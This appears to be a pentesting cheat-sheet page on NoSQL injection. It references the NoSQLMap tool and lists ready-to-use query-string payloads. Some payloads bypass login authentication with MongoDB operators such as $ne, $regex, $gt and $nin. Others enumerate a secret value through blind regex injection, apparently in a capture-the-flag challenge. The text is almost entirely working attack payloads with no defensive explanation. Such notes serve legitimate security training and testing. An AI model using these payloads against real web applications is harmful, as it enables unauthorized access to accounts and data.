NOSQL injections
NoSQLMap https://github.com/codingo/NoSQLMap
1-Set options (do this first) 2-NoSQL DB Access Attacks 3-NoSQL Web App attacks 4-Scan for Anonymous MongoDB Access x-Exit
Basic Authentication index.php?login[$regex]=a.*&pass[$ne]=lol index.php?login[$gt]=admin&login[$lt]=test&pass[$ne]=1
Basic NoSQL Injection
http://url?login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto
Blind NoSQL Injection
Get size
index.php ?chall_name=nosqlblind&flag[$regex]=.1
Enumeration
index.php ?chall_name=nosqlblind&flag[$regex]=3a.20
Last updated